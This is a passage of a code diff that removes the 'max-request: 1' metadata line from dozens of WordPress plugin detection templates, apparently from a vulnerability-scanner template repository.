--- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer-elementor/
   metadata:
-    max-request: 1
     plugin_namespace: header-footer-elementor
     wpscan: https://wpscan.com/plugin/header-footer-elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml
index 956a08b32d..95d2aa5f16 100644
--- a/http/technologies/wordpress/plugins/header-footer.yaml
+++ b/http/technologies/wordpress/plugins/header-footer.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer/
   metadata:
-    max-request: 1
     plugin_namespace: header-footer
     wpscan: https://wpscan.com/plugin/header-footer
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml
index 5a570b9077..af8193b875 100644
--- a/http/technologies/wordpress/plugins/health-check.yaml
+++ b/http/technologies/wordpress/plugins/health-check.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/health-check/
   metadata:
-    max-request: 1
     plugin_namespace: health-check
     wpscan: https://wpscan.com/plugin/health-check
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml
index 4ecac0cd92..8d7e45818b 100644
--- a/http/technologies/wordpress/plugins/hello-dolly.yaml
+++ b/http/technologies/wordpress/plugins/hello-dolly.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/hello-dolly/
   metadata:
-    max-request: 1
     plugin_namespace: hello-dolly
     wpscan: https://wpscan.com/plugin/hello-dolly
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
index e50f58cef8..ed3967db7b 100644
--- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml
+++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/host-webfonts-local/
   metadata:
-    max-request: 1
     plugin_namespace: host-webfonts-local
     wpscan: https://wpscan.com/plugin/host-webfonts-local
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml
index 031bb48563..2ff5adba86 100644
--- a/http/technologies/wordpress/plugins/imagify.yaml
+++ b/http/technologies/wordpress/plugins/imagify.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/imagify/
   metadata:
-    max-request: 1
     plugin_namespace: imagify
     wpscan: https://wpscan.com/plugin/imagify
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml
index 3cdcf3da93..9099f3c0a5 100644
--- a/http/technologies/wordpress/plugins/imsanity.yaml
+++ b/http/technologies/wordpress/plugins/imsanity.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/imsanity/
   metadata:
-    max-request: 1
     plugin_namespace: imsanity
     wpscan: https://wpscan.com/plugin/imsanity
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
index c222bc9d4a..1ee0e67542 100644
--- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
+++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/insert-headers-and-footers/
   metadata:
-    max-request: 1
     plugin_namespace: insert-headers-and-footers
     wpscan: https://wpscan.com/plugin/insert-headers-and-footers
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml
index c8acf8c625..43cb2ab09c 100644
--- a/http/technologies/wordpress/plugins/instagram-feed.yaml
+++ b/http/technologies/wordpress/plugins/instagram-feed.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/instagram-feed/
   metadata:
-    max-request: 1
     plugin_namespace: instagram-feed
     wpscan: https://wpscan.com/plugin/instagram-feed
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
index 66b7d6a363..7ba81036cf 100644
--- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/intuitive-custom-post-order/
   metadata:
-    max-request: 1
     plugin_namespace: intuitive-custom-post-order
     wpscan: https://wpscan.com/plugin/intuitive-custom-post-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml
index a36016562d..24fc3e3295 100644
--- a/http/technologies/wordpress/plugins/iwp-client.yaml
+++ b/http/technologies/wordpress/plugins/iwp-client.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/iwp-client/
   metadata:
-    max-request: 1
     plugin_namespace: iwp-client
     wpscan: https://wpscan.com/plugin/iwp-client
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml
index 8033aacbc6..3e89505574 100644
--- a/http/technologies/wordpress/plugins/jetpack-boost.yaml
+++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/jetpack-boost/
   metadata:
-    max-request: 1
     plugin_namespace: jetpack-boost
     wpscan: https://wpscan.com/plugin/jetpack-boost
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml
index e4017b1a0a..e701e365ba 100644
--- a/http/technologies/wordpress/plugins/jetpack.yaml
+++ b/http/technologies/wordpress/plugins/jetpack.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/jetpack/
   metadata:
-    max-request: 1
     plugin_namespace: jetpack
     wpscan: https://wpscan.com/plugin/jetpack
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml
index 53d6d393bd..c0cc5400a8 100644
--- a/http/technologies/wordpress/plugins/kadence-blocks.yaml
+++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/kadence-blocks/
   metadata:
-    max-request: 1
     plugin_namespace: kadence-blocks
     wpscan: https://wpscan.com/plugin/kadence-blocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml
index c286e9a14f..22687bcffe 100644
--- a/http/technologies/wordpress/plugins/kirki.yaml
+++ b/http/technologies/wordpress/plugins/kirki.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/kirki/
   metadata:
-    max-request: 1
     plugin_namespace: kirki
     wpscan: https://wpscan.com/plugin/kirki
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml
index 364e3cd71e..b69d3d5bfe 100644
--- a/http/technologies/wordpress/plugins/leadin.yaml
+++ b/http/technologies/wordpress/plugins/leadin.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/leadin/
   metadata:
-    max-request: 1
     plugin_namespace: leadin
     wpscan: https://wpscan.com/plugin/leadin
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
index 4fcccbfc33..7975a57702 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/limit-login-attempts-reloaded/
   metadata:
-    max-request: 1
     plugin_namespace: limit-login-attempts-reloaded
     wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
index 3fbc714d3b..ff4cef94d7 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/limit-login-attempts/
   metadata:
-    max-request: 1
     plugin_namespace: limit-login-attempts
     wpscan: https://wpscan.com/plugin/limit-login-attempts
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml
index c49b506979..a8903697b0 100644
--- a/http/technologies/wordpress/plugins/litespeed-cache.yaml
+++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/litespeed-cache/
   metadata:
-    max-request: 1
     plugin_namespace: litespeed-cache
     wpscan: https://wpscan.com/plugin/litespeed-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml
index dfcaf6f71b..3f141c4476 100644
--- a/http/technologies/wordpress/plugins/loco-translate.yaml
+++ b/http/technologies/wordpress/plugins/loco-translate.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/loco-translate/
   metadata:
-    max-request: 1
     plugin_namespace: loco-translate
     wpscan: https://wpscan.com/plugin/loco-translate
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml
index 61be246fee..5355e988a2 100644
--- a/http/technologies/wordpress/plugins/loginizer.yaml
+++ b/http/technologies/wordpress/plugins/loginizer.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/loginizer/
   metadata:
-    max-request: 1
     plugin_namespace: loginizer
     wpscan: https://wpscan.com/plugin/loginizer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loginpress.yaml b/http/technologies/wordpress/plugins/loginpress.yaml
index 1c16a72d76..6f06b49011 100644
--- a/http/technologies/wordpress/plugins/loginpress.yaml
+++ b/http/technologies/wordpress/plugins/loginpress.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/loginpress/
   metadata:
-    max-request: 1
     plugin_namespace: loginpress
     wpscan: https://wpscan.com/plugin/loginpress
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
index 50d2e6630b..53d409fb68 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/mailchimp-for-woocommerce/
   metadata:
-    max-request: 1
     plugin_namespace: mailchimp-for-woocommerce
     wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
index 8d71f7bde9..0e908a9580 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/mailchimp-for-wp/
   metadata:
-    max-request: 1
     plugin_namespace: mailchimp-for-wp
     wpscan: https://wpscan.com/plugin/mailchimp-for-wp
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml
index 5e1f97086e..aeb1875c57 100644
--- a/http/technologies/wordpress/plugins/mailpoet.yaml
+++ b/http/technologies/wordpress/plugins/mailpoet.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/mailpoet/
   metadata:
-    max-request: 1
     plugin_namespace: mailpoet
     wpscan: https://wpscan.com/plugin/mailpoet
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml
index d87d456a8c..7c15702305 100644
--- a/http/technologies/wordpress/plugins/maintenance.yaml
+++ b/http/technologies/wordpress/plugins/maintenance.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/maintenance/
   metadata:
-    max-request: 1
     plugin_namespace: maintenance
     wpscan: https://wpscan.com/plugin/maintenance
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml
index aa9153241e..5ce87e6c71 100644
--- a/http/technologies/wordpress/plugins/mainwp-child.yaml
+++ b/http/technologies/wordpress/plugins/mainwp-child.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/mainwp-child/
   metadata:
-    max-request: 1
     plugin_namespace: mainwp-child
     wpscan: https://wpscan.com/plugin/mainwp-child
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml
index 09641796a3..c342e6b45a 100644
--- a/http/technologies/wordpress/plugins/malcare-security.yaml
+++ b/http/technologies/wordpress/plugins/malcare-security.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/malcare-security/
   metadata:
-    max-request: 1
     plugin_namespace: malcare-security
     wpscan: https://wpscan.com/plugin/malcare-security
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml
index 28b70d09bf..e95041f555 100644
--- a/http/technologies/wordpress/plugins/megamenu.yaml
+++ b/http/technologies/wordpress/plugins/megamenu.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/megamenu/
   metadata:
-    max-request: 1
     plugin_namespace: megamenu
     wpscan: https://wpscan.com/plugin/megamenu
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml
index b43c10ed7a..879a0d1c12 100644
--- a/http/technologies/wordpress/plugins/members.yaml
+++ b/http/technologies/wordpress/plugins/members.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/members/
   metadata:
-    max-request: 1
     plugin_namespace: members
     wpscan: https://wpscan.com/plugin/members
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml
index eb7e78bc7f..985f5d373a 100644
--- a/http/technologies/wordpress/plugins/meta-box.yaml
+++ b/http/technologies/wordpress/plugins/meta-box.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/meta-box/
   metadata:
-    max-request: 1
     plugin_namespace: meta-box
     wpscan: https://wpscan.com/plugin/meta-box
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml
index 3da2ea50e1..bbc305b8de 100644
--- a/http/technologies/wordpress/plugins/ml-slider.yaml
+++ b/http/technologies/wordpress/plugins/ml-slider.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ml-slider/
   metadata:
-    max-request: 1
     plugin_namespace: ml-slider
     wpscan: https://wpscan.com/plugin/ml-slider
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml
index 7a58c58f63..7e3e4e2d7e 100644
--- a/http/technologies/wordpress/plugins/newsletter.yaml
+++ b/http/technologies/wordpress/plugins/newsletter.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/newsletter/
   metadata:
-    max-request: 1
     plugin_namespace: newsletter
     wpscan: https://wpscan.com/plugin/newsletter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
index 5f99b8cac8..17ea142c46 100644
--- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
+++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/nextend-facebook-connect/
   metadata:
-    max-request: 1
     plugin_namespace: nextend-facebook-connect
     wpscan: https://wpscan.com/plugin/nextend-facebook-connect
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
index b08876df04..953e4ab3d8 100644
--- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml
+++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/nextgen-gallery/
   metadata:
-    max-request: 1
     plugin_namespace: nextgen-gallery
     wpscan: https://wpscan.com/plugin/nextgen-gallery
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml
index 3f68dffe06..92107fa69c 100644
--- a/http/technologies/wordpress/plugins/ninja-forms.yaml
+++ b/http/technologies/wordpress/plugins/ninja-forms.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ninja-forms/
   metadata:
-    max-request: 1
     plugin_namespace: ninja-forms
     wpscan: https://wpscan.com/plugin/ninja-forms
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml
index 34f9bde1d6..5e1fe4ef5c 100644
--- a/http/technologies/wordpress/plugins/ocean-extra.yaml
+++ b/http/technologies/wordpress/plugins/ocean-extra.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ocean-extra/
   metadata:
-    max-request: 1
     plugin_namespace: ocean-extra
     wpscan: https://wpscan.com/plugin/ocean-extra
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
index d9f645328f..74fb3e6010 100644
--- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
+++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/official-facebook-pixel/
   metadata:
-    max-request: 1
     plugin_namespace: official-facebook-pixel
     wpscan: https://wpscan.com/plugin/official-facebook-pixel
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
index 8a1196fc9f..b9f70ba555 100644
--- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml
+++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/one-click-demo-import/
   metadata:
-    max-request: 1
     plugin_namespace: one-click-demo-import
     wpscan: https://wpscan.com/plugin/one-click-demo-import
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml
index 05025452b7..6486c02c9a 100644
--- a/http/technologies/wordpress/plugins/optinmonster.yaml
+++ b/http/technologies/wordpress/plugins/optinmonster.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/optinmonster/
   metadata:
-    max-request: 1
     plugin_namespace: optinmonster
     wpscan: https://wpscan.com/plugin/optinmonster
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml
index 1db1b57708..81f58198d3 100644
--- a/http/technologies/wordpress/plugins/otter-blocks.yaml
+++ b/http/technologies/wordpress/plugins/otter-blocks.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/otter-blocks/
   metadata:
-    max-request: 1
     plugin_namespace: otter-blocks
     wpscan: https://wpscan.com/plugin/otter-blocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml
index dafe6974f6..3743307dbc 100644
--- a/http/technologies/wordpress/plugins/password-protected.yaml
+++ b/http/technologies/wordpress/plugins/password-protected.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/password-protected/
   metadata:
-    max-request: 1
     plugin_namespace: password-protected
     wpscan: https://wpscan.com/plugin/password-protected
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml
index ba05fb1e16..a4c6980041 100644
--- a/http/technologies/wordpress/plugins/pdf-embedder.yaml
+++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/pdf-embedder/
   metadata:
-    max-request: 1
     plugin_namespace: pdf-embedder
     wpscan: https://wpscan.com/plugin/pdf-embedder
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
index a038adac53..e085f30e5a 100644
--- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/pinterest-for-woocommerce/
   metadata:
-    max-request: 1
     plugin_namespace: pinterest-for-woocommerce
     wpscan: https://wpscan.com/plugin/pinterest-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml
index 7f98d822a8..adf3387ddb 100644
--- a/http/technologies/wordpress/plugins/pixelyoursite.yaml
+++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/pixelyoursite/
   metadata:
-    max-request: 1
     plugin_namespace: pixelyoursite
     wpscan: https://wpscan.com/plugin/pixelyoursite
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml
index 89602f4264..eb6e1aaa5d 100644
--- a/http/technologies/wordpress/plugins/polylang.yaml
+++ b/http/technologies/wordpress/plugins/polylang.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/polylang/
   metadata:
-    max-request: 1
     plugin_namespace: polylang
     wpscan: https://wpscan.com/plugin/polylang
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml
index 2f6513ca42..b3c83cd0bf 100644
--- a/http/technologies/wordpress/plugins/popup-builder.yaml
+++ b/http/technologies/wordpress/plugins/popup-builder.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/popup-builder/
   metadata:
-    max-request: 1
     plugin_namespace: popup-builder
     wpscan: https://wpscan.com/plugin/popup-builder
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml
index 982306b13c..96d8bd6aca 100644
--- a/http/technologies/wordpress/plugins/popup-maker.yaml
+++ b/http/technologies/wordpress/plugins/popup-maker.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/popup-maker/
   metadata:
-    max-request: 1
     plugin_namespace: popup-maker
     wpscan: https://wpscan.com/plugin/popup-maker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml
index fdcac13b56..85955ac95e 100644
--- a/http/technologies/wordpress/plugins/post-smtp.yaml
+++ b/http/technologies/wordpress/plugins/post-smtp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/post-smtp/
   metadata:
-    max-request: 1
     plugin_namespace: post-smtp
     wpscan: https://wpscan.com/plugin/post-smtp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml
index fc316f9f7a..a81fc892ca 100644
--- a/http/technologies/wordpress/plugins/post-types-order.yaml
+++ b/http/technologies/wordpress/plugins/post-types-order.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/post-types-order/
   metadata:
-    max-request: 1
     plugin_namespace: post-types-order
     wpscan: https://wpscan.com/plugin/post-types-order
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
index 975b63f5de..d9c6052cd7 100644
--- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
+++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/premium-addons-for-elementor/
   metadata:
-    max-request: 1
     plugin_namespace: premium-addons-for-elementor
     wpscan: https://wpscan.com/plugin/premium-addons-for-elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml
index 5065659e82..afc1141e0c 100644
--- a/http/technologies/wordpress/plugins/pretty-link.yaml
+++ b/http/technologies/wordpress/plugins/pretty-link.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/pretty-link/
   metadata:
-    max-request: 1
     plugin_namespace: pretty-link
     wpscan: https://wpscan.com/plugin/pretty-link
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
index 732ffbc4eb..d44add9ca6 100644
--- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/really-simple-captcha/
   metadata:
-    max-request: 1
     plugin_namespace: really-simple-captcha
     wpscan: https://wpscan.com/plugin/really-simple-captcha
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
index 12dffeb534..20ba5c2e16 100644
--- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/really-simple-ssl/
   metadata:
-    max-request: 1
     plugin_namespace: really-simple-ssl
     wpscan: https://wpscan.com/plugin/really-simple-ssl
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml
index ae0e76c4bb..cbcf3cf09d 100644
--- a/http/technologies/wordpress/plugins/redirection.yaml
+++ b/http/technologies/wordpress/plugins/redirection.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/redirection/
   metadata:
-    max-request: 1
     plugin_namespace: redirection
     wpscan: https://wpscan.com/plugin/redirection
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml
index b1718d1ccb..3311d42c94 100644
--- a/http/technologies/wordpress/plugins/redux-framework.yaml
+++ b/http/technologies/wordpress/plugins/redux-framework.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/redux-framework/
   metadata:
-    max-request: 1
